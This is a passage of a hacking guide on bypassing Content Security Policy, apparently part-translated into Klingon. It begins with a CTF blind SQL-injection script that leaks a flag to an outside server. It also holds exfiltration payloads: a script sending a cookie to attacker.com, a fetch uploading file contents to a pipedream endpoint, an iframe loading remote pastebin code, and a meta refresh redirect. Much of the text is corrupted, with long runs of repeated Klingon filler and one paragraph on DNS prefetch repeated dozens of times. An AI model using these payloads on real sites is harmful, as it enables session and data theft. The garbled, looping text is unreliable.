function gen2(x) {
x = escape(x);
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23`;
}
async function query(word, end=false) {
let h = performance.now();
f.location = (end ? gen2(word) : gen(word));
await new Promise(r => {
g.onload = r;
});
let diff = performance.now() - h;
return diff > 300;
}
let alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789'.split('');
let postfix = '}'
async function run() {
let prefix = 'nn9ed{';
while (true) {
let i = 0;
for (i;i<alphabet.length;i++) {
let c = alphabet[i];
let t = await query(prefix+c); // Check what chars returns TRUE or FALSE
console.log(prefix, c, t);
if (t) {
console.log('FOUND!')
prefix += c;
break;
}
}
if (i==alphabet.length) {
console.log('missing chars');
break;
}
let t = await query(prefix+'}', true);
if (t) {
prefix += '}';
break;
}
}
new Image().src = 'http://PLAYER_SERVER/?' + prefix; //Exfiltrate the flag
console.log(prefix);
}
run();
</script>
tlhIngan Hol
QaD Bookmarklets
QaD Bookmarklets vItlhutlh ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH ghaH
<iframe src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]" csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>
{% endcode %}
ghItlh CTF writeup 'e' HTML injection 'e' CSP 'e' restrict 'e' vulnerability exploitable **'e'.
CSP 'e' restrictive 'e' HTML meta tags 'ej inline scripts 'e' disable 'e' entry 'e' nonce 'ej enable specific inline script via sha.
<meta http-equiv="Content-Security-Policy" content="script-src 'self'
'unsafe-eval' 'strict-dynamic'
'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';">
JS exfiltration with Content-Security-Policy-Report-Only
Content-Security-Policy-Report-Only header value controlled by you allows you to exfiltrate JS content by wrapping it with <script> tags. Since unsafe-inline is likely not allowed by the CSP, this triggers a CSP error and sends the sensitive information to the server from Content-Security-Policy-Report-Only.
For an example check this CTF writeup.
CVE-2020-6519
document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>";
CSP teb Iframe jImej
iframejImejDaq URL (ghojmeHhttps://example.redirect.comjImej) vItlhutlhlaHbe'chugh CSP jImejDaq jIyaj.- URL vItlhutlhlaHbe'chugh
https://example.redirect.comjImejDaq vItlhutlhlaHbe'chugh ghItlhutlhlaHbe'chugh secret URL (e.g.,https://usersecret.example2.com) jImejDaq CSP jImejDaq jIyaj. securitypolicyviolationrap 'e' vItlhutlhlaHbe'chugh,blockedURIproperty vItlhutlhlaHbe'chugh. vItlhutlhlaHbe'chugh property vItlhutlhlaHbe'chugh, vItlhutlhlaHbe'chugh blocked URI jImejDaq domain vItlhutlhlaHbe'chugh, secret domain jImejDaq leak vItlhutlhlaHbe'.
vItlhutlhlaHbe'chugh jImejDaq Chrome je Firefox jImejDaq CSP jImejDaq jIyajbe'chugh, undefined behavior vItlhutlhlaHbe'chugh jImejDaq jIyajbe'chugh, vItlhutlhlaHbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDaq jIyajbe'chugh jImejDa
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
CSP Bypass
By monitoring which requests are blocked or allowed by the CSP, one can narrow down the possible characters in the secret subdomain, eventually uncovering the full URL.
Both methods exploit the nuances of CSP implementation and behavior in browsers, demonstrating how seemingly secure policies can inadvertently leak sensitive information.
Trick from here.
Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights
Engage with content that delves into the thrill and challenges of hacking
Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights
Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates
Join us on Discord and start collaborating with top hackers today!
Unsafe Technologies to Bypass CSP
PHP response buffer overload
PHP is known for buffering the response to 4096 bytes by default. Therefore, if PHP is showing a warning, by providing enough data inside warnings, the response will be sent before the CSP header, causing the header to be ignored.
Then, the technique consists basically in filling the response buffer with warnings so the CSP header isn't sent.
Idea from this writeup.
Rewrite Error Page
From this writeup it looks like it was possible to bypass a CSP protection by loading an error page (potentially without CSP) and rewriting its content.
a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`;
}, 1000);
SOME + 'self' + wordpress
SOME (Sagh) yIlo'be'chugh XSS (be'Hom limited XSS) page endpoint abuse other endpoints of the same origin. This is done by loading the vulnerable endpoint from an attacker page and then refreshing the attacker page to the real endpoint in the same origin you want to abuse. This way the vulnerable endpoint can use the opener object in the payload to access the DOM of the real endpoint to abuse. For more information check:
{% content-ref url="../xss-cross-site-scripting/some-same-origin-method-execution.md" %} some-same-origin-method-execution.md {% endcontent-ref %}
Moreover, wordpress has a JSONP endpoint in /wp-json/wp/v2/users/1?_jsonp=data that will reflect the data sent in the output (with the limitation of only letter, numbers and dots).
An attacker can abuse that endpoint to generate a SOME attack against WordPress and embed it inside <script src=/wp-json/wp/v2/users/1?_jsonp=some_attack></script> note that this script will be loaded because it's allowed by 'self'. Moreover, and because WordPress is installed, an attacker might abuse the SOME attack through the vulnerable callback endpoint that bypasses the CSP to give more privileges to a user, install a new plugin...
For more information about how to perform this attack check https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/
CSP Exfiltration Bypasses
If there is a strict CSP that doesn't allow you to interact with external servers, there are some things you can always do to exfiltrate the information.
Location
You could just update the location to send to the attacker's server the secret information:
var sessionid = document.cookie.split('=')[1]+".";
document.location = "https://attacker.com/?" + sessionid;
Meta tag
tlhIngan Hol:
vaj vItlhutlhlaHbe'chugh, meta tag vItlhutlhlaHbe'chugh (vaj vItlhutlhlaHbe'chugh, vaj vItlhutlhlaHbe'chugh 'e' vItlhutlhlaHbe'chugh)
<meta http-equiv="refresh" content="1; http://attacker.com">
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
